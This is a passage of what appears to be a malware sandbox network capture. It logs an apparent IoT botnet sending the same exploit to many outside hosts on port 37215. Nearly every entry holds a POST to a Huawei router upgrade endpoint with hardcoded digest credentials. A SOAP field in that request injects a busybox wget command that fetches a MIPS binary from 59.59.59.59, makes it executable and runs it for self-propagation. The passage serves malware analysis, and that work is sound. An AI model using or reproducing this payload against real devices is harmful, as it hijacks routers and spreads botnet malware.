70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          259192.168.2.155915041.4.235.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525963068 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          260192.168.2.1544942197.83.67.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532341003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          261192.168.2.1557606192.122.239.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532402039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          262192.168.2.155644890.254.150.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532465935 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          263192.168.2.155912631.105.24.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532502890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          264192.168.2.154977041.200.236.19437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532577991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          265192.168.2.1560934157.10.254.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532596111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          266192.168.2.1545788157.25.12.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532625914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          267192.168.2.1553218197.137.29.337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532726049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          268192.168.2.155988443.71.235.5737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532743931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          269192.168.2.1533818157.82.138.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.532778978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
